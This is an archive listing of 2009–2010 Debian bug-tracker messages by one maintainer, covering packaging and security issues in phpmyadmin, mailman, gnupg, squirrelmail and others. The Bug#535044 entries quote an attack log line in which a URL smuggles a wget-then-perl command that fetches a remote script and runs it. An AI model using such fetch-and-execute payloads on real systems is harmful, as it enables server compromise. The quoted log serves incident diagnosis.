Bug#563211: [phpmyadmin] Broken JavaScript (table structure Details, search Options) (click has no effect)

2010-01-03 Thread Thijs Kinkhorst
On Saturday 2 January 2010, Michal Čihař wrote: Ah, the problem is that we use system mootools instead of the one shipped with phpMyAdmin and it looks like there was both mootools and mootools-extra combined in one file, which causes the extra classes to be missing. Still thinking about proper

Bug#563433: php5-imagick: Config uses deprecated comment style; generates warning on each PHP cli invocation

2010-01-02 Thread Thijs Kinkhorst
Package: php5-imagick Version: 2.1.1RC1-1 Severity: normal Hi, The shipped imagick.ini config file snippet uses deprecated config file comment syntax. This leads to a message like follows for each CLI invocation: PHP Deprecated: Comments starting with '#' are deprecated in

Bug#563437: Uninstallable: trying to overwrite '/usr/share/php/doc', which is also in package php-pear

2010-01-02 Thread Thijs Kinkhorst
Package: php5-symfony1.0 Version: 1.0.21-1.1 Severity: grave Justification: makes package uninstallable Hi, When I try to install the package, it tries to overwrite a symlink that is shipped by 'php-pear', namely /usr/share/php/doc: The following NEW packages will be installed:

Bug#562700: [Pkg-mailman-hackers] Bug#562700: postfix-to-mailman.py does not handle mailman-l...@domain

2009-12-30 Thread Thijs Kinkhorst
On Wednesday 30 December 2009, Tobias Diedrich wrote: Thanks for your report. I am adding '-loop' to the list in postfix-to-mailman.py under the # Check for control extension on local part comment. Can you confirm that this resolves your problem? I think it should rather be added to the #

Bug#562700: [Pkg-mailman-hackers] Bug#562700: postfix-to-mailman.py does not handle mailman-l...@domain

2009-12-30 Thread Thijs Kinkhorst
On Wednesday 30 December 2009, Tobias Diedrich wrote: I have to correct myself here a bit after looking at the postmaster message again: The 'message needs to be moderated mail' goes to -owner. mailman expands owner to someu...@t-online.de and sends it with envelope sender mailman-bounces

Bug#549224: [Pkg-mailman-hackers] Bug#549224: [mm-deb] Bug#549224: postfix-to-mailman.py cannot receive cookies

2009-12-30 Thread Thijs Kinkhorst
to changelog.Debian Thijs Kinkhorst broke it for mm 1:2.1.8-2. Yeah, and that fix for #305762 is wrong. Postfix needs to make exceptions for mailman lists if it is configured non-standard. You are right. I didn't at the time perceive these negative ramifications of the change. It will be reverted

Bug#562634: CVE-2009-4412: Unrestricted file upload vulnerability

2009-12-30 Thread Thijs Kinkhorst
On Saturday 26 December 2009, Giuseppe Iuculano wrote: CVE-2009-4412[0]: | Unrestricted file upload vulnerability in Serendipity before 1.5 | allows remote authenticated users to execute arbitrary code by | uploading a file with an executable extension followed by a safe | extension, then

Bug#561641: After installing a default apache2 and then a default squirrelmail, restarting apache2 cause a segfault

2009-12-30 Thread Thijs Kinkhorst
severity 561641 normal tags 561641 moreinfo thanks On Saturday 19 December 2009, th...@thing.dyndns.org wrote: Segfault is as follows, - Dec 19 16:50:20 warlock kernel: [ 831.591136] apache2[2408]: segfault at 0 ip b6e1681f sp bfcc5c3d error 6 in pdo.so[b6e11000+14000] This can be repeated

Bug#562700: [Pkg-mailman-hackers] Bug#562700: postfix-to-mailman.py does not handle mailman-l...@domain

2009-12-29 Thread Thijs Kinkhorst
On Sun, December 27, 2009 06:42, Tobias Diedrich wrote: One of my list admins uses a T-Online account, which rejects spam, creating a mail loop. Mailman detects this and tries to send the message to mailman-l...@domain, which fails because I use postfix-to-mailman.py for the domain and it

Bug#437836: (no subject)

2009-12-25 Thread Thijs Kinkhorst
On Monday 21 December 2009, J.M.Roth wrote: within a few weeks, when Lenny is out of the door So? ;-) I'm afraid we're low on manpower for this package. I've asked Jeroen whether we should ask for more maintainers and/or give it up for adoption.. cheers, Thijs

Bug#545484: [Pkg-nagios-devel] Bug#545484: Bug#545484: nagios-plugins-basic: enable SSL certificate validity check by default

2009-12-18 Thread Thijs Kinkhorst
into it again. OK. -- Thijs Kinkhorst th...@uvt.nl – LIS Unix Universiteit van Tilburg – Library and IT Services • Postbus 90153, 5000 LE Bezoekadres Warandelaan 2 • Tel. 013 466 3035 • G 236 • http://www.uvt.nl

Bug#509415: patch for python-gnupginterface NMU

2009-12-18 Thread Thijs Kinkhorst
short term. I think this is appropriate because: (1) the bug has been open for a year without maintainer activity, (2) the package hasn't been uploaded in 3 years, (3) maintainers are on lowthresholdNMU. cheers, Thijs -- Thijs Kinkhorst th...@uvt.nl – LIS Unix Universiteit van Tilburg

Bug#559881: libphp-phpmailer: New upstream version available

2009-12-07 Thread Thijs Kinkhorst
Package: libphp-phpmailer Version: 2.3-2 Severity: wishlist Hi, A new upstream version is available: 5.1.0. Would be nice if it could be packaged so it will be included in Squeeze before that freezes. thanks, Thijs -- System Information: Debian Release: 5.0.3 APT prefers stable APT

Bug#557353: don't warn about non-standard-file-perm 0440 in etc/sudoers.d

2009-11-21 Thread Thijs Kinkhorst
Package: lintian Version: 2.2.18 Severity: wishlist Hi, sudo supports an /etc/sudoers.d/ directory in which config snippets can be placed. The README in that dir states that files there should have 0440 file mode. Lintian could therefore be taught not to emit this warning: W:

Bug#557181: add warning to the man page that no directories will be printed

2009-11-21 Thread Thijs Kinkhorst
tag 557181 pending thanks On Friday 20 November 2009, jida...@jidanni.org wrote: Therefore please add a warning the man page: Due to the limitations of Contents-*.gz files, **directories, empty or not, are not found**. This is in contrast to dlocate(1). E.g., one might end up with no idea

Bug#557204: man pages have unsubstituted substitution variables

2009-11-20 Thread Thijs Kinkhorst
Package: sudo Version: 1.7.2p1-1 Severity: minor Hi, The sudo man pages in this version have unsubstituted substitution variables. Two examples from sudoers(5): If no value is specified, a value of once is implied. Negating the option results in a value of never being used.

Bug#556964: mpc: fails to connect to mpd with IPv6 address if client not on IPv6

2009-11-18 Thread Thijs Kinkhorst
Package: mpc Version: 0.12.1-1 Severity: important Tags: ipv6 Hi, Our mpd runs on a host with both an IPv4 and an IPv6 address. My workstation only has an IPv4 address (but does have the ipv6 kernel module loaded as per Debian default). This makes mpc fail with Network is unreachable.

Bug#545484: [Pkg-nagios-devel] Bug#545484: nagios-plugins-basic: enable SSL certificate validity check by default

2009-11-18 Thread Thijs Kinkhorst
Hi Jan, On Monday, 7. September 2009, Thijs Kinkhorst wrote: A number of Nagios plugins include useful functionality when connecting over SSL: they check if the certificate is still valid and report a warning or error when it (soon) expires. Attached is a patch that in the shipped

Bug#549882: ttf-mscorefonts-installer shouldn't return an error if there are no access to corefonts download servers, should display an interactive dialog instead

2009-11-09 Thread Thijs Kinkhorst
On Tuesday 3 November 2009, Mantas Kriaučiūnas wrote: Hi, On Mon, 2 Nov 2009, Thijs Kinkhorst th...@debian.org wrote: On Monday 2 November 2009, Marc Randolph wrote: This issue is turning out to be a pretty big deal... it has generated something on the order of 10 bug reports a day

Bug#549882: ttf-mscorefonts-installer: Poor handling of font downloads

2009-11-02 Thread Thijs Kinkhorst
Hi Marc, On Monday 2 November 2009, Marc Randolph wrote: This issue is turning out to be a pretty big deal... it has generated something on the order of 10 bug reports a day for Ubuntu (https://bugs.launchpad.net/ubuntu/+source/msttcorefonts) since 9.10 was released a week ago. If anyone

Bug#504328: NMU of Smarty uploaded to DELAYED/10

2009-10-24 Thread Thijs Kinkhorst
to address open security issues. +(CVE-2008-4810, CVE-2008-4811, CVE-2009-1669, +closes: #529810, #504328) + * Remove installation of smarty_icon.README and unit_test, +dropped upstream. + + -- Thijs Kinkhorst th...@debian.org Sat, 24 Oct 2009 12:40:12 +0200 + smarty (2.6.22-1) unstable

Bug#551171: tmpreaper: debconf security question not accurate anymore

2009-10-16 Thread Thijs Kinkhorst
Package: tmpreaper Version: 1.6.10 Severity: minor Hi, Installing tmpreaper gives you the debconf question about security. The action to take is not entirely accurate anymore: If after that you still want tmpreaper to run, please edit /etc/tmpreaper.conf and remove the line: . echo Please

Bug#550822: [Pkg-gnupg-maint] Processed: reassign 550822 to gnupg

2009-10-16 Thread Thijs Kinkhorst
On Tue, October 13, 2009 11:45, Debian Bug Tracking System wrote: retitle 550822 gnupg: gnupg (squeeze) depends on dpkg (= 1.15.4) found in Changed Bug title to 'gnupg: gnupg (squeeze) depends on dpkg (= 1.15.4) found in unstable' Well, indeed it does. But gnupg declares this dependency

Bug#529810: Smarty open security issues

2009-10-14 Thread Thijs Kinkhorst
Hey all, There are three open security issues in Smarty, details are in bugs #504328 and #529810. Are there plans to upload fixed packages sometime soon (at least for unstable)? thanks, Thijs

Bug#550588: kmail: reproducible crash: answer read receipt question while having selected a different mail meanwhile

2009-10-11 Thread Thijs Kinkhorst
Package: kmail Version: 4:3.5.9-5 Severity: normal Hi, There's a reproducible crash (segfault) in kmail, at least in oldstable and stable. How to reproduce: 1) Send yourself an email that requests a read receipt. 2) Click on the email. A dialog appears with the question what to do with this

Bug#549882: ttf-mscorefonts-installer: Poor handling of font downloads

2009-10-08 Thread Thijs Kinkhorst
On Tuesday 6 October 2009, Daniel Skorka wrote: The way the package tries to get the fonts isn't very clever. If the first (two or three, it seems) mirrors fail, the remaining mirrors are not tried. This has, in my case, happened consistently for several days, preventing the installation of all

Bug#549883: ttf-mscorefonts-installer: Allow to reuse fonts already available locally

2009-10-08 Thread Thijs Kinkhorst
On Tuesday 6 October 2009, Daniel Skorka wrote: It would be nice if this package offered the option of specifying a path where to look for the .ttf files instead of downloading them. This way, one could for example just grab them from an existing windows installation. A MD5 sum check could

Bug#548546: merkaartor: minor symlink attack

2009-09-27 Thread Thijs Kinkhorst
On Sunday 27 September 2009, Paul Wise wrote: Package: merkaartor Version: 0.14+svnfixes~20090912-1 Severity: important Tags: security Found a minor symlink attack in merkaartor. It allows a local attacker to append the contents of the merkaartor log file to arbitrary files owned by the

Bug#548602: PTS: typo: introduces news bugs

2009-09-27 Thread Thijs Kinkhorst
Package: qa.debian.org Severity: minor Hi, The PTS page for gnupg displays this as TODO: # Updating gnupg introduces news bugs: #546552, #545275. Which has a typo in news. cheers, Thijs

Bug#524762: [Pkg-mailman-hackers] Bug#524762: mailman: Please include the mmdsr script from upstream /contrib

2009-09-27 Thread Thijs Kinkhorst
On Sunday 19 April 2009, Cristian Rigamonti wrote: The upstream source package contain a very useful script to produce daily statistics and error reports: /contrib/mmdsr Why is this not included in the Debian package? It can not simply be copied into the package as it will not work without

Bug#544046: [Pkg-mailman-hackers] Bug#544046: mailman: postinst find takes far too long

2009-09-25 Thread Thijs Kinkhorst
Hi Paul, p...@mail:~$ ps -fe | grep find root      6846  5473  9 12:50 pts/0    00:00:39 find /var/lib/mailman/ -type d -exec chmod g+s {} ; paul     11875 31817  0 13:01 pts/48   00:00:00 grep find It's still running. Ah, at 13:03 it's done. is more efficient, is there an expectation

Bug#391000: [Pkg-mailman-hackers] Bug#391000: mailman: upgrade process, takes hours even if the upgrade is supposed to be a simple security upgrade

2009-09-25 Thread Thijs Kinkhorst
forcemerge 544046 391000 thanks On Thursday 7 May 2009, Ricardo Ramirez wrote: FYI, my site has extensive archives including attachments in /var/lib/mailman/archive so when the permissions are fixed it takes an extraordinary amount of time. Indeed, this is not really necessary so it will

Bug#524662: [Pkg-mailman-hackers] Bug#524662: mailman: after the 17/4 update mailma does not longer accept messages even from wgitelisted users,

2009-09-25 Thread Thijs Kinkhorst
severity 524662 important tags unreproducible moreinfo thanks Hi, from http page: ** Bug in Mailman version 2.1.11 We're sorry, we hit a bug! admin(7526): [- Mailman Version: 2.1.11 -] admin(7526): [- Traceback --] admin(7526): Traceback (most recent call last):

Bug#543818: CVE-2009-2964: Multiple cross-site request forgery (CSRF) vulnerabilities

2009-09-25 Thread Thijs Kinkhorst
Hi, Thanks. I am aware of the issue, but since the patch is of rather high impact I need to study a bit on the correct way of getting it into Debian. cheers, Thijs

Bug#545236: use SHA512 for checksums instead of SHA256

2009-09-07 Thread Thijs Kinkhorst
On Sun, September 6, 2009 00:15, Christoph Anton Mitterer wrote: May I suggest that you use SHA512 instead of SHA256 for checksumming the downloaded files, for security reasons? I'm not sure what concrete value this change would add. Both 512 and 256 are accepted, non-broken hashes and seem

Bug#545268: [Pkg-gnupg-maint] Bug#545268: gnupg: FTBFS against debhelper 7.2.3, workaround for missing dh_bugfiles broken

2009-09-07 Thread Thijs Kinkhorst
tags 545268 pending thanks Hi Andreas, On Sun, September 6, 2009 08:42, Andreas Metzler wrote: which dh_bugfiles dh_bugfiles exits with nonzero exit code if dh_bugfiles is not present. The fix is simple: Thanks, I have verified that gnupg builds successfully on lenny with this fix applied.

Bug#545275: [Pkg-gnupg-maint] Bug#545275: priority important package depending on optional one.

2009-09-07 Thread Thijs Kinkhorst
Hi all, On Sun, September 6, 2009 09:47, Andreas Metzler wrote: the new gnupg now *depends* on libcurl3-gnutls. gnupg is priority important and a part of base system since debian-archive-keyring depends on it. Daniel, can you look into this issue, since you're the one who made the change

Bug#545484: nagios-plugins-basic: enable SSL certificate validity check by default

2009-09-07 Thread Thijs Kinkhorst
Package: nagios-plugins-basic Version: 1.4.12-5 Severity: wishlist Hi, A number of Nagios plugins include useful functionality when connecting over SSL: they check if the certificate is still valid and report a warning or error when it (soon) expires. I end up enabling this functionality in my

Bug#543460: phpmyadmin: No password protection for setup.php script

2009-08-25 Thread Thijs Kinkhorst
On Tue, August 25, 2009 15:58, Michele Bonera wrote: On Tuesday 25 August 2009 14:12:01 Nico Golde wrote: * Michele Bonera mich...@bonera.biz [2009-08-25 13:43]: Package: phpmyadmin Version: 4:2.9.1.1-11 Severity: grave Tags: security Justification: user security hole After

Bug#538392: group staff: moving forward

2009-08-11 Thread Thijs Kinkhorst
Hi, The TC has decided on the following resolution for the group staff issue: | 2. Decide to change the default so that /usr/local is not writeable by | group staff anymore. This change should only be implemented after an | appropriate transition plan exists which enables system

Bug#538392: group staff: moving forward

2009-08-11 Thread Thijs Kinkhorst
On Tue, August 11, 2009 22:53, Russ Allbery wrote: Thijs Kinkhorst th...@debian.org writes: The TC has decided on the following resolution for the group staff issue: | 2. Decide to change the default so that /usr/local is not writeable by | group staff anymore. This change should only

Bug#538392: group staff: moving forward

2009-08-11 Thread Thijs Kinkhorst
On Tue, August 11, 2009 23:22, Russ Allbery wrote: Thijs Kinkhorst th...@debian.org writes: I'm not sure it's entirely equivalent, as the directory in the new situation would be owned by group 0 / root. This is clearly a special group just as user root is a special user; much more clearly

Bug#286301: patch for 286301 NMU

2009-08-03 Thread Thijs Kinkhorst
: #286301). + + -- Thijs Kinkhorst th...@debian.org Mon, 03 Aug 2009 21:34:12 +0200 + portmap (6.0-10) unstable; urgency=low * Merge from Ubuntu

Bug#538975: CVE name assigned

2009-07-28 Thread Thijs Kinkhorst
This is CVE-2009-0696 and CERT VU#725188. Please reference them in any relevant changelogs.

Bug#538817: [Pkg-mailman-hackers] Bug#538817: mailman incorrectly remembers old setting

2009-07-27 Thread Thijs Kinkhorst
On Monday 27 July 2009, Olaf Zaplinski wrote: I used to have mailman running at list1.foo.bar. After some time, I purged mailman. About half a year later I reinstalled mailman and configured it at list2.bar.foo. When I open my browser on http://list2.bar.foo/mailman/admin/mailman and click

Bug#517860: bug not fixed

2009-07-25 Thread Thijs Kinkhorst
reopen 517860 thanks Hi, I don't think this bug was actually fixed. The changelog entry also does not match the bug content:    * Fixes section number in zebra.8 manpage. Closes: #517860 The bug is about a TCP port number, not manpage section number. cheers, Thijs

Bug#537099: short_open_tag is now off

2009-07-14 Thread Thijs Kinkhorst
Package: php5 Version: 5.3.0-2 Hi all, I've been trying the new php5 packages from experimental. One thing that immediately broke my installation is that short_open_tag was turned off in the default configuration. I'm very unsure that we should be doing that: in my experience many

Bug#518169: Bug#516394: so what is the solution?

2009-07-11 Thread Thijs Kinkhorst
On Saturday 11 July 2009, Gerrit Pape wrote: On Fri, Jul 10, 2009, Florian Weimer wrote: [something about http://bugs.debian.org/516394] A misunderstanding again, I'm asking about the bug http://bugs.debian.org/518169 The packages I prepared for stable are available since more than four

Bug#536182: rumours of openssh attack, upgrade sid?

2009-07-08 Thread Thijs Kinkhorst
Hi, You may have heard of the rumours that there's a new OpenSSH exploit but it's unclear what this exploit actually is or whether it even exists: http://isc.sans.org/diary.html?storyid=6742 However, one consistent claim is that the current version of OpenSSH isn't affected. It would make sense

Bug#535751: apt-file update doesn't work

2009-07-06 Thread Thijs Kinkhorst
On Sat, July 4, 2009 21:47, arne anka wrote: now, it works again. i had some issues with the newly upgraded ia32-apt-get -- i'd guess the very same issues made apt-file break. anyway, any useful error messages would be highly appreciated, getting the help when you are sure you did nothing

Bug#534973: stable updates

2009-07-06 Thread Thijs Kinkhorst
Hi Håkan, version 1:1.5.2-5 that I released to unstable is suitable for stable as well. Prior to this bugfix unstable and stable both contained version 1:1.5.2-4. Attached is a patch with the fix. Do you want me to build it for stable as well? Thank you for getting in touch with us. Judging

Bug#535751: apt-file update doesn't work

2009-07-04 Thread Thijs Kinkhorst
On Sat, July 4, 2009 20:16, arne anka wrote: Package: apt-file Version: 2.2.2 Severity: normal running apt-file update only results in a listing of the help (ie the same output as apt-file --help). Thanks for reporting, but I cannot reproduce this. Can you please paste the full original

Bug#516394: so what is the solution?

2009-07-02 Thread Thijs Kinkhorst
On Tuesday 30 June 2009, Gerrit Pape wrote: While we wait for who knows how long, I suggest we get the fix for #518169 into stable; packages still are available through http://niequai.smarden.org/ruGho2e/ Hi, I don't understand why the confirmed fix for the reproducible bug with security

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
Hi Laurant, After looking at my logs, I did notice a lot of attempts to break in phpmyadmin through the following kind of url: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On Monday 29 June 2009, Michal Čihař wrote: 82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET //phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O% 20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null It seems PHPMyAdmin shipped with Lenny is still vulnerable to

Bug#535044: phpmyadmin: PHPMyAdmin seems to be vulnerable to some code injection

2009-06-29 Thread Thijs Kinkhorst
On Monday 29 June 2009, Michal Čihař wrote: No, in the log, he is using exploited config file (with some custom code inside). Ah right. I don't think there's a way we can realistically do anything about an already-compromised installation. That is a general truth for any vulnerability: how

Bug#534618: /var/lib/phpmyadmin/config.inc.php gets broken

2009-06-25 Thread Thijs Kinkhorst
On Thursday 25 June 2009, Olaf van der Spek wrote: I've no idea how the phpinfo() ended up in this file, but I've seen it on multiple servers. Could this be a vulnerability in phpMyAdmin? Or some bug in the Debian package? Hi Olaf, As it seems this is the result of a phpMyAdmin worm that

Bug#532376: r8169: network buffer overflow

2009-06-09 Thread Thijs Kinkhorst
On Tuesday 9 June 2009, Ben Hutchings wrote: Package: linux-2.6 Version: 2.6.29-5 Severity: critical Tags: security patch Some or all NICs supported by r8169 seem to ignore the buffer sizes in RX descriptors, and will write up to the global maximum frame size. This means a remote attacker

Bug#531601: ITP: ttytter -- console Twitter client

2009-06-02 Thread Thijs Kinkhorst
Package: wnpp Severity: wishlist Owner: Thijs Kinkhorst th...@debian.org * Package name: ttytter Version : 0.9.5 Upstream Author : Cameron Kaiser http://twitter.com/doctorlinguist * URL : http://www.floodgap.com/software/ttytter/ * License : Floodgap Free

Bug#531152: security.debian.org: Old perl upload in lenny security updates

2009-05-30 Thread Thijs Kinkhorst
reassign 531152 ftp.debian.org thanks On Saturday 30 May 2009, Dominic Hargreaves wrote: Package: security.debian.org Severity: normal There is a libperl5.8 binary package in lenny security updates: libperl5.8: Installed: (none) Candidate: 5.8.8-11.1+lenny1 Version table:

Bug#527941: caff $CONFIG{'keyserver'} should default to a better keyserver

2009-05-30 Thread Thijs Kinkhorst
On Tuesday 26 May 2009, Daniel Kahn Gillmor wrote: My experience is that subkeys.pgp.net has many more non-responsive nodes, and that pool.sks-keyservers.net is more active in clearing out non-responsive keyservers from its round-robin DNS. Of course, this could change at the whim of the

Bug#527944: caff should default to stronger digests for signatures than SHA1

2009-05-26 Thread Thijs Kinkhorst
Hi Daniel, On Sat, May 9, 2009 17:37, Daniel Kahn Gillmor wrote: SHA-1 is significantly weakened, and we should be strongly encouraging new certifications to be something stronger (SHA-256 at least) [0]. Caff should do this automatically. something like: # $CONFIG{'cert-digest-algo'} =

Bug#527941: caff $CONFIG{'keyserver'} should default to a better keyserver

2009-05-26 Thread Thijs Kinkhorst
On Sat, May 9, 2009 16:52, Daniel Kahn Gillmor wrote: Currently, caff defaults to using subkeys.pgp.net as its keyserver. The various SKS keyservers seem to currently be significantly more robust than subkeys.pgp.net I recommend switching the default keyserver to either keys.gnupg.net or

Bug#530599: myspell-nl should be used for nl_BE

2009-05-26 Thread Thijs Kinkhorst
Dear Jean-Louis, On Tue, May 26, 2009 10:56, Jean-Louis Dupond wrote: Package: dutch Version: 1:1.00-2 The myspell-nl package only contains dictionary for nl_NL, but it should include nl_BE also, as its just the same dict. The fix is quite easy, just need to add additional symlinks to the

Bug#530599: myspell-nl should be used for nl_BE

2009-05-26 Thread Thijs Kinkhorst
Dear Jean-Louis, On Tue, May 26, 2009 13:16, Jean-Louis Dupond wrote: Dear Thijs, OpenOffice, for example, uses nl_BE. The spelling checker in OpenOffice does not work when it is set to Dutch (Belgium). But after creating those 4 symlinks it works perfectly. Google also indicates

Bug#528528: 1.4.19

2009-05-26 Thread Thijs Kinkhorst
On Tue, May 26, 2009 13:59, Kevin Fernandez wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Does the debian security update include the fix of squirrelmail 1.4.19? Have you read this? http://lists.debian.org/debian-security-announce/2009/msg00116.html Thijs

Bug#530281: [php-maint] Bug#530281: php5: easy fix for FTBFS on hurd-i386

2009-05-25 Thread Thijs Kinkhorst
forwarded 530281 http://bugs.php.net/48389 thanks On Saturday 23 May 2009, Marc Dequènes (Duck) wrote: Please consider applying this patch which fixes POSIX incompatibilities responsible for the FTBFS on Hurd, and IPv6 support deactivation (on this arch only), as it is not yet available.

Bug#497825: [Pkg-gnupg-maint] Bug#497825: Clone+Reassign to gpgv of #433091 apt-get: ignores expiry of archive keys

2009-05-23 Thread Thijs Kinkhorst
Hi Peter, Sorry for not getting back to this earlier. On Monday 6 April 2009, Peter Palfrader wrote: m...@book:/% sudo gpg --keyring etc/apt/trusted.gpg --verify var/lib/apt/lists/localhost_debian_dists_sid_Release.gpg var/lib/apt/lists/localhost_debian_dists_sid_Release gpg: WARNING:

Bug#529924: duplicate-short-description between deb and udeb

2009-05-22 Thread Thijs Kinkhorst
Package: lintian Version: 2.2.10 Severity: minor Hi, My package 'gnupg' generates the following info-level tag: duplicate-short-description gnupg gnupg-udeb I believe this may be inappropriate where the description overlap is between the deb and its associated udeb. In the Lintian report

Bug#529979: please ship /etc/nagios/nrpe.d directory

2009-05-22 Thread Thijs Kinkhorst
Package: nagios-nrpe-server Severity: wishlist Hi, The NRPE server by default reads config snippets from /etc/nagios/nrpe.d: # you can place your config snipplets into nrpe.d/ include_dir=/etc/nagios/nrpe.d/ This directory however is not shipped in the .deb. It would make sense to me

Bug#529760: add php5-suhosin as a recommendation

2009-05-21 Thread Thijs Kinkhorst
Package: php5 Severity: wishlist Perhaps we should add php5-suhosin as a Recommends of php5. To me it seems altogether wise to install this extension and in its default state it doesn't do much explicit harm. Doing so would stimulate more people to secure their PHP5 setups. If you really don't

Bug#529329: breaks if a spam rule is applied only to unread mails

2009-05-20 Thread Thijs Kinkhorst
forcemerge 529329 529328 tags 529329 fixed-upstream thanks You wrote: Warning: Invalid argument supplied for foreach() in /usr/share/squirrelmail/plugins/filters/filters.php on line 427 Thank you for your report, this is indeed a bug. It has been fixed upstream in the meanwhile, and will be

Bug#499942: this bug in etch

2009-05-19 Thread Thijs Kinkhorst
We are not fixing this bug in etch, because fixing it requires changing behaviour and that's not desirable in a stable release. The issue is not very grave. From squirrelmail/2:1.4.9a-4 on, a solution is to put the following in your config.php: $only_secure_cookies = true;

Bug#528833: [debian/debian-sid] Update php5-cli package description to make it more neutral, thanks Daniel Hahler (closes: #528833).

2009-05-17 Thread Thijs Kinkhorst
tag 528833 pending thanks Date: Sun May 17 14:35:36 2009 +0200 Author: Thijs Kinkhorst th...@debian.org Commit ID: aaeedb8c4b6b7723fd393c3425ccbdb65b22eb30 Commit URL: http://git.debian.org/?p=pkg-php/php.git;a=commitdiff;h=aaeedb8c4b6b7723fd393c3425ccbdb65b22eb30 Patch URL: http

Bug#528833: [debian/debian-sid] Update php5-cli package description to make it more neutral, thanks Daniel Hahler (closes: #528833).

2009-05-17 Thread Thijs Kinkhorst
tag 528833 pending thanks Date: Sun May 17 14:36:29 2009 +0200 Author: Thijs Kinkhorst th...@loeki.tv Commit ID: eeea0ad042028b9cf8c7bcfe36303a005741b50c Commit URL: http://git.debian.org/?p=pkg-php/php.git;a=commitdiff;h=eeea0ad042028b9cf8c7bcfe36303a005741b50c Patch URL: http://git.debian.org

Bug#528833: [php-maint] Bug#528833: Please remove language bias from php5-cli package description

2009-05-17 Thread Thijs Kinkhorst
On Saturday 16 May 2009, Daniel Hahler wrote: In the description of php5-cli it says:   This package provides the /usr/bin/php5 command interpreter, useful for testing PHP scripts from a shell, or perhaps even performing general shell scripting tasks, if you're frightened of perl and

Bug#528787: Problems to download attachment files with special characters in the name

2009-05-17 Thread Thijs Kinkhorst
tags 528787 unreproducible thanks Hi Arthur, On Friday 15 May 2009, Arthur Furlan wrote: I'm getting trouble in Firefox/Iceweasel to read and download attachment files that use special characters like á, à, é, è, ç, etc. in its name. When I click to download them I got an error page in

Bug#528749: Cyrus SASL library buffer overflow vulnerability

2009-05-15 Thread Thijs Kinkhorst
Package: cyrus-sasl2 Severity: serious Tags: security Hi, The following vulnerability has been published for Cyrus SASL: Cyrus SASL library buffer overflow vulnerability Overview The Cyrus SASL library contains a buffer overflow vulnerability that could allow an attacker to execute code or

Bug#528528: [Secure-testing-team] Bug#528528: [squirrelmail] Please bring latest security-fix release 1.4.18

2009-05-13 Thread Thijs Kinkhorst
On Wednesday 13 May 2009, Philippe Teuwen wrote: several security fixes Thanks for the report. I'm already aware and updates will follow as soon as possible. Thijs

Bug#528565: squirrelmail-logger: should enable logging (to syslog?) out of the box

2009-05-13 Thread Thijs Kinkhorst
Package: squirrelmail-logger Version: 2.3-2 Severity: normal Hi Hauke, Thanks for your great work on packaging the logger plugin. However, installing it does not start to log things by default. I think it should do this - packages should provide a working configuration if possible. It makes

Bug#527964: squirrelmail should log username sending an e-mail

2009-05-11 Thread Thijs Kinkhorst
On Monday 11 May 2009, CJ Fearnley wrote: The Message-ID is the only guaranteed to be available on all systems method (I've confirmed that sendmail, postfix, and exim all log Message-ID by default) to ensure that site operators have access to the Authenticated username who used or abused

Bug#527964: squirrelmail should log username sending an e-mail

2009-05-09 Thread Thijs Kinkhorst
tags 527964 -patch severity 527964 wishlist thanks Hi, On Saturday 9 May 2009, CJ Fearnley wrote: If a user of squirrelmail sends spam, for example, or, in general, if the admin needs to find out who the sender of a particular e-mail logged by the MTA is, then the current version provides

Bug#345911: gnupg: Memory leak fix

2009-05-07 Thread Thijs Kinkhorst
On Thursday 7 May 2009, Daniel Leidert wrote: This issue has been fixed for both GnuPG versions in upstream SVN revision 4993 (1.4) and 4994 (2.x). See https://bugs.g10code.com/gnupg/issue1034. The patch is attached. @Thijs: Does this fix/issue qualify for an update of the packages in

Bug#433091: CVE id assigned

2009-04-22 Thread Thijs Kinkhorst
This is CVE-2009-1358. Please reference it in the appropriate changelog entry. Thanks, Thijs

Bug#524980: SLURM daemons do not drop supplemental groups

2009-04-21 Thread Thijs Kinkhorst
Package: slurm-llnl Version: 1.3.6-1 Severity: grave Tags: security patch pending The following issue has been reported on the slurm-llnl mailinglist. Updated packages are in preparation. -- Forwarded Message -- A security flaw has been discovered in all releases of SLURM

Bug#524804: more info

2009-04-20 Thread Thijs Kinkhorst
On Mon, April 20, 2009 15:53, Michael S. Gilbert wrote: On Mon, 20 Apr 2009 12:52:28 +0200, Thijs Kinkhorst wrote: On Mon, April 20, 2009 06:15, Michael S. Gilbert wrote: i was looking at the link as provided in redhat's announcement. this seems to be CVE-2009-1285, which debian is already

Bug#523213: CVE name assigned

2009-04-18 Thread Thijs Kinkhorst
This is CVE-2009-1300. Please add it in the relevant package changelog.

Bug#521941: Repositories from security in security web

2009-03-31 Thread Thijs Kinkhorst
On Tue, March 31, 2009 00:05, José Illescas Pérez wrote: I think that repo of latest security updates in Security Information Web is incorrect. The current repo in this web page is: deb http://security.debian.org/ lenny/updates main contrib non-free and doesn't work. I can't download

Bug#521884: [Pkg-gnupg-maint] Bug#521884: gnupg: reversed logic of the nocheck test in debian/rules

2009-03-30 Thread Thijs Kinkhorst
tags 521884 pending thanks Hi Neil, On Monday 30 March 2009, Neil Williams wrote: This test in debian/rules has reversed the logic of the test: ifneq (,$(findstring nocheck,$(DEB_BUILD_OPTIONS)))     make -C build-deb/checks check || exit 1 endif You are indeed completely correct. Thanks

Bug#516669: files owned by !root

2009-03-25 Thread Thijs Kinkhorst
On Tue, March 24, 2009 19:51, Luk Claes wrote: Thijs Kinkhorst wrote: On Tue, March 24, 2009 11:34, Gerrit Pape wrote: On Mon, Feb 23, 2009 at 04:37:29PM +0100, Thijs Kinkhorst wrote: Gerrit, it would be great if you could provide updated packages for stable-security and oldstable

Bug#516669: files owned by !root

2009-03-24 Thread Thijs Kinkhorst
On Tue, March 24, 2009 11:34, Gerrit Pape wrote: On Mon, Feb 23, 2009 at 04:37:29PM +0100, Thijs Kinkhorst wrote: Gerrit, it would be great if you could provide updated packages for stable-security and oldstable-security. Please upload them to security-master, and make sure you build

Bug#520040: setting package to mailman, tagging 520040

2009-03-21 Thread Thijs Kinkhorst
